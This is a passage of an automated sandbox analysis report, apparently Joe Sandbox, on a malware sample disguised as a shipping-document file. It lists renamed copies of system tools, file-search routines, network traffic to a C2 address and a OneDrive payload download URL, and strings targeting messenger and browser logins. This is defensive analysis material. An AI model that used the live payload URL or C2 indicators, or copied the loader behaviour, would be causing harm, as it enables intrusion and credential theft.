00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27959AF5 FindFirstFileW,	0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose,	0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794783C FindFirstFileW,FindNextFileW,	0_2_2794783C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	32_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	32_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	32_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	34_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	34_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	34_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	34_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	34_2_00007FF70CC97B4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040AE51 FindFirstFileW,FindNextFileW,	36_2_0040AE51
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	37_2_00407EF8

Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	File opened: C:\Users\user\AppData\Local\Temp\18A2.tmp	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw
Source: Malware configuration extractor	URLs: 104.250.180.178

Uses ping.exe to check the status of other devices and networks

Source: C:\Users\Public\alpha.exe

Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_028BD028 InternetCheckConnectionA,

0_2_028BD028

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 104.250.180.178:7902

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.139.11 13.107.139.11
Source: Joe Sandbox View	IP Address: 104.250.180.178 104.250.180.178
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,

0_2_2795B380

Source: global traffic	HTTP traffic detected: GET /download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv5415.tmp.36.dr	String found in binary or memory: pop-lva1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv5415.tmp.36.dr	String found in binary or memory: pop-lva1.www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic	DNS traffic detected: DNS query: c6c4bq.db.files.1drv.com
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: bhv5415.tmp.36.dr	String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
